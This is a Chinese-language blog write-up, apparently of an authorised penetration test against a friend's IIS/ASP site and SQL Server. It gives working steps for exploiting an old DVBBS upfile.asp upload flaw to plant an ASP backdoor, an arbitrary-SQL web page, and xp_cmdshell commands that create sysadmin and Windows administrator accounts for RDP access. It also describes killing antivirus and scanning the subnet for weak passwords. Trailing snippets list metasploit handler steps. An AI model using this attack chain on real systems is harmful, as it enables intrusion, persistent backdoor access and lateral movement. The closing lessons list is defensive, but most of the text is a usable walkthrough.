首先使用superscan掃了一下常用埠,沒有問題,只開了80,返回iis5.0,win2k差不離;
掃瞄常見cgi/iis漏洞,沒有問題,打了sp4補丁,到目前為止還不錯;
到網頁上轉了轉,發現是用asp寫的,自然要掃掃sql注入了,也許你以為這次成功了吧,很不幸,沒有。
自己做的網頁,自然沒有asp源**看,後台也掃不出來,這下沒辦法了吧?
聽說他要做個bbs,但是網頁上沒有鏈結,於是根據他的習慣和**名稱猜bbs名字,
終於,哈哈,http://x.y.z.v/***bbs
出來了,進去看了一看,暈倒,bbs也是自己搞的,很簡陋
已經有幾篇測試文章了。
不過,有個細節,每個發文人都有一副**,而且不是qq裡面那種,同時看看了路徑,/***bbs/myfaces
上傳上去的?......
立馬申請乙個使用者進去,果真可以換臉,哈哈哈
upfile.asp,開啟居然看到了「檔名」、上傳
看著upfile.asp的介面咋這麼眼熟呢?......dvbbs早期版本抄過來的?
不會這麼樂,碰到上傳漏洞了吧?
winsockexpert抓cookie,再上nc**傳asp後門,暈,還真傳上去了......
至此**伺服器已經搞定,至於提權什麼的,我又不是真正的入侵,沒必要了
開啟後門,瀏覽磁碟,順便看看**connectdb.asp,得到sql伺服器位址a.b.c.d、登陸名sa及密碼!
不用想了,sqlexec連線之......失敗!
tell me why?
有點意思......
再上superscan掃a.b.c.d,開了21(serv-u 6.1)、3389,
1433(ms-sql)**去了?估計是有防火牆,只允許**ip連線1433,為了測試,
用asp後門抓下他的connectdb.asp,在自己的asp空間裡面做個測試網頁,
通過這個connectdb.asp連線他的sql,果真連線不上,看了防火牆做了ip位址限制無疑。
臨時寫了乙個sql執行頁面,傳到他的**,**是可以連到sql伺服器的嘛,呵呵:
********************==test.asp******************************
<%
dim strsql,objrs,rs
set objrs = server.createobject("adodb.recordset")
strsql = request("strsql")
response.write "strsql=" &strsql
if strsql <> "" then
err.clear
objrs.open strsql ,conn
%>
<%
do while not objrs.eof
for each rs in objrs.fields
%>
<%=rs.name%>
<%=rs.value%>
<%
next
objrs.movenext
loop
end if
closedatabase'這個是connectdb.asp定義的,出於好習慣,要關一下
response.end
%>
********************==test.asp******************************
到這裡,就是純粹的sql知識複習了
哈哈,不用想了,依次提交:
select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell'
返回1,xp_cmdshell沒關,這老哥看來剛弄完不久,急吼吼讓我測試,這下測出大事了,呵呵!
exec master..xp_cmdshell 'dir c:/'
返回"驅動器 c 中的卷是",哈哈,真的沒問題
exec master.dbo.sp_addlogin 'l0op8ack'
加乙個sql帳號
exec master.dbo.sp_password null,'mypassword','l0op8ack'
設定sql帳號密碼
exec master.dbo.sp_addsrvrolemember 'l0op8ack',sysadmin
將sql帳號公升為sysadmin,這個需要sa或者dbo許可權才行,
當然,如果你夠閒,可以重寫sp_addsrvrolemember過程,去掉身份判斷部分即可
exec master.dbo.xp_cmdshell 'net user l0op8ack /add'
有3389,自然要加個系統帳號
exec master.dbo.xp_cmdshell 'net user l0op8ack mypassword'
給系統帳號設個密碼,這裡設簡單一點,'"之類的特殊字元可能sql會出錯
exec master.dbo.xp_cmdshell 'net localgroup administrators l0op8ack /add'
系統帳號l0op8ack光榮加入administrators!
開始->執行->mstsc,連線,3389終於到手,進去溜達溜達
哇賽,1g記憶體,160g硬碟,好有錢哪(/-___-/)
ipconfig /all
居然是個/24的掩碼,暈倒,看來今天想收手都難啊,
殺掉各種防毒軟體,就地當各種掃瞄軟體,跑了1個小時,又有20多台ipc弱密碼出來了
當然,是我的密碼字典不錯,呵呵!
到此就算結束了,
刪除sql伺服器上的系統帳號,開啟防毒軟體,刪除sql帳號,
刪除**上的test.asp和asp後門,將upfile.asp重新命名
趕緊打**給這位老哥,看來晚上這頓飯有人管了,哈哈!
因為乙個小小的錯誤,導致大面積機器被控制,這裡需要總結一下:
1)**為了圖方便,使用老版本的dvbbs upfile.asp;
2)使用了sa帳號連sql伺服器
3)沒有去掉sql上的不必要過程
4)即使在防火牆(硬體的)保護範圍內,相互之間也不是全部可信的,個人防火牆還是需要的
5)不要讓你的對手太了解你的個人習慣|:)
code by amxku
記一次內網滲透
1.生成乙個木馬檔案 2.將生成的木馬上傳到目標機器上 3.啟動msfconsole。4.準備工作 1 use exploit multi handler 2 set lhost 192.168.20.11 3 set lport 1234 4 exploit 5 執行之前準備的木馬檔案 5.開始試...
記一次滲透測試某路由器
開局乙個路由器,滲透全靠莽,漏洞全靠猜!簡單記錄一下 某個廠商的路由器,網上找不到該型號路由器的相關資料,韌體也搜尋不出來!ssh埠開放,測試發現存在使用者名稱列舉漏洞,存在使用者root,爆破也沒有什麼結果 ssh登入提示警告,登入禁止,所以就算爆破出來密碼也沒啥用了,放棄之 有的zebra路由埠...
一次簡單的滲透測試
由於當時做的時候忘了截圖,所以就直接寫步驟了。1 先用御劍進行後台掃瞄,找到管理員的登陸位址。如果有robots.txt就可以不用掃瞄目錄了 2 先試一試比較常見的弱口令,然後開啟啊d工具,進行猜解使用者名稱和密碼。3 用猜解出的使用者名稱和密碼登陸。5 用中國菜刀進行連線,輸入系統命令,出錯,可能...